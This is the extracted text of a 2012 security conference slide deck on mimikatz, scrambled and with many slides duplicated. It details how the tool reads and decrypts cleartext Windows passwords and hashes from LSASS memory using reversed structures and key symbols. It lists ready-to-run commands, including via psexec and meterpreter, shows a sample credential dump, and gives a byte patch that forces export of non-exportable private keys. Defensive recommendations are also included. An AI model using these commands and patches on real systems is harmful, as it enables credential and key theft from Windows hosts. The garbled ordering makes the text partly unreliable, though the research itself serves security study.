ndash Use Hardware Security Modules (HSM) even SoftHSM
More in depth ndash See what Microsoft can do with TPM from Windows 8
bull Virtual SmartCard seems promising
ndash Verify vendors implementation (Lenovo Dell hellip) of TPM CSPKSP bull Their biometrics stuff was a little buggy )
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 54 54
mimikatz what else can it do
mimikatz what else can it do
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker SRP bypass
Driver ndash Play with tokens amp privileges
ndash Display SSDT x86 amp x64
ndash List minifilters actions
ndash List Notifications (process thread image registry)
ndash List Objects hooks and procedures
ndash hellip
hellip
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker SRP bypass
Driver ndash Play with tokens amp privileges
ndash Display SSDT x86 amp x64
ndash List minifilters actions
ndash List Notifications (process thread image registry)
ndash List Objects hooks and procedures
ndash hellip
hellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 55 55
mimikatz thatrsquos all folks
mimikatz thatrsquos all folks
Thanksrsquo to Merci agrave
ndash my girlfriend for her support (her LSASS crashed few times)
ndash Application Security Forum to offer me this great opportunity bull Partners and Sponsors for sure
ndash Microsoft to always consider it as normalacceptable
ndash Security friendscommunity for their ideas amp challenges bull nagual newsoft mubix hellip
ndash You for your attention
Questions
Donrsquot be shy )
especially if you have written the corresponding slide number
Thanksrsquo to Merci agrave
ndash my girlfriend for her support (her LSASS crashed few times)
ndash Application Security Forum to offer me this great opportunity bull Partners and Sponsors for sure
ndash Microsoft to always consider it as normalacceptable
ndash Security friendscommunity for their ideas amp challenges bull nagual newsoft mubix hellip
ndash You for your attention
Questions
Donrsquot be shy )
especially if you have written the corresponding slide number
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 56 56
Blog Source Code amp Contact Blog Source Code amp Contact
blog httpbloggentilkiwicom mimikatz httpbloggentilkiwicommimikatz source httpscodegooglecompmimikatz email benjamingentilkiwicom
blog httpbloggentilkiwicom mimikatz httpbloggentilkiwicommimikatz source httpscodegooglecompmimikatz email benjamingentilkiwicom
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 57 57
mimikatz sekurlsa livessp mimikatz sekurlsa livessp
because Microsoft was too good in closed networks
because Microsoft was too good in closed networks
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 22 22
mimikatz sekurlsa livessp how
mimikatz sekurlsa livessp how
Actually Irsquove only used logical (empirical) approach to search passwordshellip ndash Protocol reading
ndash Symbols searching
~ Boring ~hellip be more brutal this time make a WinDBG trap
Actually Irsquove only used logical (empirical) approach to search passwordshellip ndash Protocol reading
ndash Symbols searching
~ Boring ~hellip be more brutal this time make a WinDBG trap
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 23 23
0 kdgt process 0 0 lsassexe PROCESS 83569040 SessionId 0 Cid 0224 Peb 7f43f000 ParentCid 01b4 DirBase 5df58100 ObjectTable 80ce4740 HandleCount ltData Not Accessiblegt Image lsassexe 0 kdgt process i 83569040 You need to continue execution (press g ltentergt) for the context to be switched When the debugger breaks in again you will be in the new process context 0 kdgt g Break instruction exception - code 80000003 (first chance) ntRtlpBreakWithStatusInstruction 814b39d0 cc int 3 0 kdgt reload user Loading User Symbols 0 kdgt bp p $proc lsasrvLsaProtectMemory kc 5 g 0 kdgt g
mimikatz sekurlsa livessp how
mimikatz sekurlsa livessp how
Letrsquos login with a Live account on Windows 8
After credentials protection LsaApLogonUserEx2 calls LiveCreateLogonSession to insert data in LiveGlobalLogonSessionList (similar to WDigest)
Letrsquos login with a Live account on Windows 8
After credentials protection LsaApLogonUserEx2 calls LiveCreateLogonSession to insert data in LiveGlobalLogonSessionList (similar to WDigest)
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 24 24
lsasrvLsaProtectMemory livesspLiveMakeSupplementalCred livesspLiveMakeSecPkgCredentials livesspLsaApLogonUserEx2 livesspSpiLogonUserEx2 lsasrvLsaProtectMemory msv1_0NlpAddPrimaryCredential msv1_0SspAcceptCredentials msv1_0SpAcceptCredentials lsasrvLsaProtectMemory tspkgTSHidePassword tspkgSpAcceptCredentials
1 kdgt uf c livesspLsaApLogonUserEx2 livesspLsaApLogonUserEx2 (74781536) [] livesspLsaApLogonUserEx2+0x560 (74781a96) call to livesspLiveCreateLogonSession (74784867)
Our LiveSSP provider
Yeah Pass the Hash capability with Live account toohellip
Live user can logon through RDP via SSO
mimikatz sekurlsa livessp workflow
mimikatz sekurlsa livessp workflow
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 25 25
LsaUnprotectMemory
LsaEnumerateLogonSessions
for each LUID
password in clear
typedef struct _KIWI_LIVESSP_LIST_ENTRY struct _KIWI_LIVESSP_LIST_ENTRY Flink struct _KIWI_LIVESSP_LIST_ENTRY Blink PVOID unk0 PVOID unk1 PVOID unk2 PVOID unk3 DWORD unk4 DWORD unk5 PVOID unk6 LUID LocallyUniqueIdentifier LSA_UNICODE_STRING UserName PVOID unk7 PKIWI_LIVESSP_PRIMARY_CREDENTIAL suppCreds
KIWI_LIVESSP_LIST_ENTRY PKIWI_LIVESSP_LIST_ENTRY
livesspLiveGlobalLogonSessionList
search linked list for LUID
KIWI_LIVESSP_LISKIWI_LIVESSP_LIST_ENTRY KIWI_LIVESSP_PRIKIWI_LIVESSP_PRIMARY_CREDENTIAL
typedef struct _KIWI_LIVESSP_PRIMARY_CREDENTIAL DWORD isSupp DWORD unk0 LSA_UNICODE_STRING UserName LSA_UNICODE_STRING Domaine LSA_UNICODE_STRING Password
KIWI_LIVESSP_PRIMARY_CREDENTIAL PKIWI_LIVESSP_PRIMARY_CREDENTIAL
mimikatz sekurlsa mimikatz sekurlsa
Even if we already have tools for normal accounts are you not curious to test one with this trap
Even if we already have tools for normal accounts are you not curious to test one with this trap
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 26 26
Me yes
mimikatz sekurlsa kerberos mimikatz sekurlsa kerberos
Letrsquos login normal account
After credentials protection KerbCreateLogonSession calls ndash NT6 KerbInsertOrLocateLogonSession to insert data in
KerbGlobalLogonSessionTable
ndash NT5 KerbInsertLogonSession to insert data in KerbLogonSessionList
Letrsquos login normal account
After credentials protection KerbCreateLogonSession calls ndash NT6 KerbInsertOrLocateLogonSession to insert data in
KerbGlobalLogonSessionTable
ndash NT5 KerbInsertLogonSession to insert data in KerbLogonSessionList
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 27 27
lsasrvLsaProtectMemory kerberosKerbHideKey kerberosKerbCreatePrimaryCredentials kerberosKerbCreateLogonSession kerberosSpAcceptCredentials lsasrvLsaProtectMemory kerberosKerbHidePassword kerberosKerbCreateLogonSession kerberosSpAcceptCredentials lsasrvLsaProtectMemory msv1_0NlpAddPrimaryCredential msv1_0SspAcceptCredentials msv1_0SpAcceptCredentials lsasrvLsaProtectMemory wdigestSpAcceptCredentials lsasrvLsaProtectMemory tspkgTSHidePassword tspkgSpAcceptCredentials
Kerberos part for password
Kerberos ticket part Maybe )
mimikatz sekurlsa kerberos (nt6) workflow
mimikatz sekurlsa kerberos (nt6) workflow
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 28 28
RtlLookupElementGenericTableAvl
LsaUnprotectMemory
KIWI_KERBEROS_PR
KIWI_KERBEROS_PRIMARY_CREDENTIAL
typedef struct _KIWI_KERBEROS_PRIMARY_CREDENTIAL DWORD unk0 PVOID unk1 PVOID unk2 PVOID unk3 ifdef _M_X64 BYTE unk4[32] elif defined _M_IX86 BYTE unk4[20] endif LUID LocallyUniqueIdentifier ifdef _M_X64 BYTE unk5[44] elif defined _M_IX86 BYTE unk5[36] endif LSA_UNICODE_STRING UserName LSA_UNICODE_STRING Domaine LSA_UNICODE_STRING Password KIWI_KERBEROS_PRIMARY_CREDENTIAL PKIWI_KERBEROS_PRIMARY_CREDENTIAL
LsaEnumerateLogonSessions
for each LUID
password in clear
KIWI_KERBEROS_PR
KIWI_KERBEROS_PRIMARY_CREDENTIAL
KerberosKerbGlobalLogonSessionTable
mimikatz sekurlsa kerberos (nt5) workflow
mimikatz sekurlsa kerberos (nt5) workflow
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 29 29
LsaUnprotectMemory
LsaEnumerateLogonSessions
for each LUID
password in clear
typedef struct _KIWI_KERBEROS_LOGON_SESSION struct _KIWI_KERBEROS_LOGON_SESSION Flink struct _KIWI_KERBEROS_LOGON_SESSION Blink DWORD UsageCount PVOID unk0 PVOID unk1 PVOID unk2 DWORD unk3 DWORD unk4 PVOID unk5 PVOID unk6 PVOID unk7 LUID LocallyUniqueIdentifier
ifdef _M_IX86 DWORD unk8
endif DWORD unk9 DWORD unk10 PVOID unk11 DWORD unk12 DWORD unk13 PVOID unk14 PVOID unk15 PVOID unk16 [hellip] LSA_UNICODE_STRING UserName LSA_UNICODE_STRING Domaine LSA_UNICODE_STRING Password
KIWI_KERBEROS_LOGON_SESSION PKIWI_KERBEROS_LOGON_SESSION
kerberosKerbLogonSessionList
search linked list for LUID
KIWI_LIVESSP_PRIKIWI_LIVESSP_PRIMARY_CREDENTIAL
mimikatz sekurlsa demo time
mimikatz sekurlsa demo time
Final sekurlsa demo sekurlsalogonPasswords full
Final sekurlsa demo sekurlsalogonPasswords full
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 30 30
mimikatz sekurlsa kerberos ldquohu rdquo
mimikatz sekurlsa kerberos ldquohu rdquo
Ok It workshellip
But why
Not at all logon on NT5 (can need an unlock)
From my understanding of Microsoft explanations
ndash no need of passwords for the Kerberos protocolhellip
ndash all is based on the hash (not very sexy too)
Microsoftrsquos implementation of Kerberos is full of logicalhellip
ndash For password auth
bull password hash for shared secret but keeping password in memory
ndash For full smartcard auth
bull No password on client
bull No hash on client
ndash NTLM hash on clienthellip
ndash KDC sent it back as a gift
Ok It workshellip
But why
Not at all logon on NT5 (can need an unlock)
From my understanding of Microsoft explanations
ndash no need of passwords for the Kerberos protocolhellip
ndash all is based on the hash (not very sexy too)
Microsoftrsquos implementation of Kerberos is full of logicalhellip
ndash For password auth
bull password hash for shared secret but keeping password in memory
ndash For full smartcard auth
bull No password on client
bull No hash on client
ndash NTLM hash on clienthellip
ndash KDC sent it back as a gift
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 31 31
mimikatz sekurlsa mimikatz sekurlsa
All passwords in memory are encrypted but in a reversible way to be used
We used LsaUnprotecMemory in the LSASS context to decrypt them
ndash This function rely on LsaEncryptMemory from lsasrvdll
For that we previously inject a DLL (sekurlsadll) in the LSASS process to take benefits of its keys when we called it
Can it be fun to decrypt outside the process ndash Yes it ishellip no more injection just reading memory of LSASS processhellip
mimikatz can use lsasrvdll too and ldquoimportsrdquo LSASS initialized keys ndash When we call LsaEncryptMemory in mimikatz with all keys imported from LSASS we have
the same comportments than when we are in LSASS
All passwords in memory are encrypted but in a reversible way to be used
We used LsaUnprotecMemory in the LSASS context to decrypt them
ndash This function rely on LsaEncryptMemory from lsasrvdll
For that we previously inject a DLL (sekurlsadll) in the LSASS process to take benefits of its keys when we called it
Can it be fun to decrypt outside the process ndash Yes it ishellip no more injection just reading memory of LSASS processhellip
mimikatz can use lsasrvdll too and ldquoimportsrdquo LSASS initialized keys ndash When we call LsaEncryptMemory in mimikatz with all keys imported from LSASS we have
the same comportments than when we are in LSASS
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 32 32
LsaUnprotectMemory
mimikatz sekurlsa LsaEncryptMemory NT5
mimikatz sekurlsa LsaEncryptMemory NT5
Depending on the size of the secret LsaEncryptMemory use
ndash RC4
ndash DESx
Depending on the size of the secret LsaEncryptMemory use
ndash RC4
ndash DESx
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 33 33
g_pRandomKey
g_cbRandomKey
BYTE[g_cbRandomKey]
DWORD 256
BYTE[g_cbRandomKey]
g_pDESXKey BYTE[144]
BYTE[144]
g_Feedback BYTE[8]
lsass
lsass
lsasrv
lsasrv
lsass
lsass
lsasrv
lsasrv
mimikatz
mimikatz
lsasrv
lsasrv
copyhellip
mimikatz sekurlsa LsaEncryptMemory NT6
mimikatz sekurlsa LsaEncryptMemory NT6
Depending on the size of the secret LsaEncryptMemory use
ndash 3DES
ndash AES
Depending on the size of the secret LsaEncryptMemory use
ndash 3DES
ndash AES
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 34 34
InitializationVector BYTE[16]
lsass
lsass
lsasrv
lsasrv
lsass
lsass
lsasrv
lsasrv
mimikatz
mimikatz
copyhellip
h3DesKey
typedef struct _KIWI_BCRYPT_KEY_DATA DWORD size DWORD tag DWORD type DWORD unk0 DWORD unk1 DWORD unk2 DWORD unk3 PVOID unk4 BYTE data etc KIWI_BCRYPT_KEY_DATA PKIWI_BCRYPT_KEY_DATA
hAesKey
lsasrv
lsasrv
typedef struct _KIWI_BCRYPT_KEY DWORD size DWORD type PVOID unk0 PKIWI_BCRYPT_KEY_DATA cle PVOID unk1 KIWI_BCRYPT_KEY PKIWI_BCRYPT_KEY
mimikatz sekurlsa memo
mimikatz sekurlsa memo
Security Packages
Protection Keys
Security Packages
Protection Keys
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 35 35
Package Symbols Type
tspkg tspkgTSGlobalCredTable RTL_AVL_TABLE
wdigest wdigestl_LogSessList LIST_ENTRY
livessp livesspLiveGlobalLogonSessionList LIST_ENTRY
kerberos (nt5) kerberosKerbLogonSessionList LIST_ENTRY
kerberos (nt6) kerberosKerbGlobalLogonSessionTable RTL_AVL_TABLE
msv1_0 lsasrvLogonSessionList lsasrvLogonSessionListCount
LIST_ENTRY ULONG
Key NT 5 Symbols
RC4 lsasrvg_cbRandomKey lsasrvg_pRandomKey
DESx lsasrvg_pDESXKey lsasrvg_Feedback
Key NT 6 Symbols
lsasrvInitializationVector
3DES lsasrvh3DesKey
AES lsasrvhAesKey
mimikatz sekurlsa memo
mimikatz sekurlsa memo
Some commands mimikatz privilegedebug sekurlsalogonPasswords full exit
psexec windows -s -c cmimikatzWin32mimikatzexe sekurlsalogonPasswords full exit
meterpreter gt execute -H -c -i -m -f pentestpasswordsmimikatzmimikatz_x86exe
Some commands mimikatz privilegedebug sekurlsalogonPasswords full exit
psexec windows -s -c cmimikatzWin32mimikatzexe sekurlsalogonPasswords full exit
meterpreter gt execute -H -c -i -m -f pentestpasswordsmimikatzmimikatz_x86exe
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 36 36
mimikatz 10 x64 (RC) Traitement du Kiwi (Aug 2 2012 013228) httpbloggentilkiwicommimikatz mimikatz privilegedebug Demande dACTIVATION du privilegravege SeDebugPrivilege OK mimikatz sekurlsalogonPasswords full Authentification Id 0234870 Package dauthentification NTLM Utilisateur principal Gentil Kiwi Domaine dauthentification vm-w8-rp-x msv1_0 Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Hash LM d0e9aee149655a6075e4540af1f22d3b Hash NTLM cc36cf7a8514893efccd332446158b1a kerberos Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234 wdigest Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234 tspkg Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234 livessp nt (LUID KO)
mimikatz sekurlsa what we can do
mimikatz sekurlsa what we can do
Basics ndash No physical access to computer (first step to pass the hash then pass the pass) ndash No admin rights system rights debug privileges (hellip) ndash Disable local admin accounts ndash Strong passwords (haha it was a joke so useless ) ndash For privileged account network login instead of interactive (when possible) ndash Audit pass the hash keeps traces and can lock accounts ndash No admin rights system rights debug privileges even VIP ndash Use separated network (or forest) for privileged tasks
More in depth ndash Force strong authentication (SmartCard amp Token) $ euro ndash Short validity for Kerberos tickets ndash No delegation ndash Disable NTLM (available with NT6) ndash No exotic
bull biometrics (it keeps password somewhere and push it to Windows) bull single sign on
ndash Stop shared secrets for authentication push Public Private stuff (like keys )) ndash Let opportunities to stop retro compatibility ndash Disable faulty providers
bull Is it supported by Microsoft bull Even if you can disable LiveSSP TsPkg and WDigest will you disable Kerberos and msv1_0
Basics ndash No physical access to computer (first step to pass the hash then pass the pass) ndash No admin rights system rights debug privileges (hellip) ndash Disable local admin accounts ndash Strong passwords (haha it was a joke so useless ) ndash For privileged account network login instead of interactive (when possible) ndash Audit pass the hash keeps traces and can lock accounts ndash No admin rights system rights debug privileges even VIP ndash Use separated network (or forest) for privileged tasks
More in depth ndash Force strong authentication (SmartCard amp Token) $ euro ndash Short validity for Kerberos tickets ndash No delegation ndash Disable NTLM (available with NT6) ndash No exotic
bull biometrics (it keeps password somewhere and push it to Windows) bull single sign on
ndash Stop shared secrets for authentication push Public Private stuff (like keys )) ndash Let opportunities to stop retro compatibility ndash Disable faulty providers
bull Is it supported by Microsoft bull Even if you can disable LiveSSP TsPkg and WDigest will you disable Kerberos and msv1_0
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 37 37
mimikatz crypto what is it
mimikatz crypto what is it
A little module that I wrote to ndash play with Windows Cryptographic API CNG and RSA keys
ndash automate export of certificateskeys bull Even those which are ldquonotrdquo exportable
What crypto module can do ndash List
bull Providers
bull Stores
bull Certificates
bull Keys
ndash Export bull Certificates
ndash public in DER format
ndash with private keys in PFX format
bull Private keys in PVK format ndash itrsquos cool OpenSSL can deal with it too
ndash Patch bull CryptoAPI in mimikatz context
bull CNG in LSASS context (again )
A little module that I wrote to ndash play with Windows Cryptographic API CNG and RSA keys
ndash automate export of certificateskeys bull Even those which are ldquonotrdquo exportable
What crypto module can do ndash List
bull Providers
bull Stores
bull Certificates
bull Keys
ndash Export bull Certificates
ndash public in DER format
ndash with private keys in PFX format
bull Private keys in PVK format ndash itrsquos cool OpenSSL can deal with it too
ndash Patch bull CryptoAPI in mimikatz context
bull CNG in LSASS context (again )
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 38 38
mod_mimikatz_crypto
mimikatz crypto how itrsquos protected
mimikatz crypto how itrsquos protected
Private keys are DPAPI protected ndash You cannot reuse private key files on another computer
bull At least without the master keys andor password of users
ComputerUser can load their own keys because they have enough secrets to do it (ex session opened) ndash Yes a computerserver open a ldquosessionrdquo
ExportUsage can be limited by ndash Password
ndash Popup
ndash ExportArchive flag no present
Private keys are DPAPI protected ndash You cannot reuse private key files on another computer
bull At least without the master keys andor password of users
ComputerUser can load their own keys because they have enough secrets to do it (ex session opened) ndash Yes a computerserver open a ldquosessionrdquo
ExportUsage can be limited by ndash Password
ndash Popup
ndash ExportArchive flag no present
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 39 39
Constraint for most user Unavailable for computer keys
certutil -importpfx mycertp12 NoExport certutil -csp Microsoft Enhanced Cryptographic Provider v10 -importpfx mycertp12 NoExport
mimikatz crypto capi how it works
mimikatz crypto capi how it works
ldquoMicrosoft CryptoAPI provides a secure interface for the cryptographic functionality that is supplied by the installable cryptographic service provider (CSP) modules CSPs perform all cryptographic operations and manage private keys CSPs can be implemented in software as well as in hardwarerdquo ndash httptechnetmicrosoftcomlibrarycc962093aspx
Processes (mimikatz IIS Active Directory Internet Explorer yourappsherehellip) load some DLL to deal with different cryptographic stuff CSP (keys) smartcard reader hellip ndash cryptdlldll rsaenhdll hellip
Process deal with cryptographic keys by this APIhellip
ldquoMicrosoft CryptoAPI provides a secure interface for the cryptographic functionality that is supplied by the installable cryptographic service provider (CSP) modules CSPs perform all cryptographic operations and manage private keys CSPs can be implemented in software as well as in hardwarerdquo ndash httptechnetmicrosoftcomlibrarycc962093aspx
Processes (mimikatz IIS Active Directory Internet Explorer yourappsherehellip) load some DLL to deal with different cryptographic stuff CSP (keys) smartcard reader hellip ndash cryptdlldll rsaenhdll hellip
Process deal with cryptographic keys by this APIhellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 40 40
mimikatz crypto capi how itrsquos exported ( level)
mimikatz crypto capi how itrsquos exported ( level)
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 41 41
Process
CryptoAPI and RSA CSP
Exportable
Load Private Key
Exported Key
yes
NTE_BAD_KEY_STATE
no
DPAPI Decode
PLAYSKOOL
Ask to export Key
mimikatz crypto patchcapi because I own my process
mimikatz crypto patchcapi because I own my process
When we want to export a certificate with its private key (or only the key) it goes in rsaenhCPExportKey
This function do all the work to prepare the export and check if the key is exportable
When we want to export a certificate with its private key (or only the key) it goes in rsaenhCPExportKey
This function do all the work to prepare the export and check if the key is exportable
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 42 42
mimikatz cryptoexportCertificates Emplacement CERT_SYSTEM_STORE_CURRENT_USERMy - Benjamin Delpy Container Cleacute 470ADFBA-8718-4014-B05E-B30776B75A03 Provider Microsoft Enhanced Cryptographic Provider v10 Type AT_KEYEXCHANGE Exportabiliteacute NON Taille cleacute 2048 Export priveacute dans CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpypfx KO (0x8009000b) Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute Export public dans CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpyder OK
================ Certificat 0 ================ Numeacutero de seacuterie 112169417a1c3ef46a301f99385f50680fa0 Eacutemetteur CN=GlobalSign CodeSigning CA - G2 O=GlobalSign nv-sa C=BE Objet CN=Benjamin Delpy C=FR Il ne sagit pas dun certificat racine Hach cert (sha1) ab 9e 92 b9 43 ed 47 d9 15 bc 26 93 9e 24 a5 83 03 ac aa 7e Conteneur de cleacute = 470ADFBA-8718-4014-B05E-B30776B75A03 Fournisseur = Microsoft Enhanced Cryptographic Provider v10 La cleacute priveacutee NE PEUT PAS ecirctre exporteacutee Succegraves du test de cryptage CertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813) CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute
Exportable
mimikatz crypto patchcapi because I own my process
mimikatz crypto patchcapi because I own my process
So what A module in my own process return that I canrsquot do something CryptoAPI is in my memory space letrsquos patch it
I wrote ldquo4rdquo bytes in my memory space
So what A module in my own process return that I canrsquot do something CryptoAPI is in my memory space letrsquos patch it
I wrote ldquo4rdquo bytes in my memory space
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 43 43
text0AC0B7CB 0F 85 33 C7 FF FF jnz continue_key_export_or_archive
text0AC0B7CB 90 nop
text0AC0B7CC E9 33 C7 FF FF jmp continue_key_export_or_archive
text0AC1F749 0F 85 B6 3B FF FF jnz continue_key_export_or_archive_prepare
text0AC1F749 90 nop
text0AC1F74A E9 B6 3B FF FF jmp continue_key_export_or_archive_prepare
mimikatz crypto patchcapi demo time
mimikatz crypto patchcapi demo time
Import export import as not exportablehellip export
Import export import as not exportablehellip export
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 44 44
mimikatz crypto patchcapi limitations
mimikatz crypto patchcapi limitations
Because ndash Irsquom lazy
ndash Irsquove seen in majority of case RSA keys for real life use bull Elliptic Curve a littlehellip
mimikatz cryptopatchcapi only deal with ndash Microsoft Base Cryptographic Provider v10
ndash Microsoft Enhanced Cryptographic Provider v10
ndash Microsoft Enhanced RSA and AES Cryptographic Provider
ndash Microsoft RSA SChannel Cryptographic Provider
ndash Microsoft Strong Cryptographic Provider
hellipall based on rsaenhdll
Because ndash Irsquom lazy
ndash Irsquove seen in majority of case RSA keys for real life use bull Elliptic Curve a littlehellip
mimikatz cryptopatchcapi only deal with ndash Microsoft Base Cryptographic Provider v10
ndash Microsoft Enhanced Cryptographic Provider v10
ndash Microsoft Enhanced RSA and AES Cryptographic Provider
ndash Microsoft RSA SChannel Cryptographic Provider
ndash Microsoft Strong Cryptographic Provider
hellipall based on rsaenhdll
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 45 45
mimikatz crypto cng how it works
mimikatz crypto cng how it works
ldquoCryptography API Next Generation (CNG) is the long-term replacement for the CryptoAPI CNG is designed to be extensible at many levels and cryptography agnostic in behaviorrdquo ndash httpmsdnmicrosoftcomlibrarywindowsdesktopaa376210aspx
ldquoTo comply with common criteria (CC) requirements the long-lived keys must be isolated so that they are never present in the application process CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default
This time keys operations are not made in the ldquouserrdquo process context
Process use RPC to call ldquoKey isolation servicerdquo (keyiso) functions
It seems more secure than CryptoAPIhellip ndash It is but itrsquos not perfecthellip
ldquoCryptography API Next Generation (CNG) is the long-term replacement for the CryptoAPI CNG is designed to be extensible at many levels and cryptography agnostic in behaviorrdquo ndash httpmsdnmicrosoftcomlibrarywindowsdesktopaa376210aspx
ldquoTo comply with common criteria (CC) requirements the long-lived keys must be isolated so that they are never present in the application process CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default
This time keys operations are not made in the ldquouserrdquo process context
Process use RPC to call ldquoKey isolation servicerdquo (keyiso) functions
It seems more secure than CryptoAPIhellip ndash It is but itrsquos not perfecthellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 46 46
mimikatz crypto cng how itrsquos exported ( level)
mimikatz crypto cng how itrsquos exported ( level)
KeyIso Service (LSASS Process)
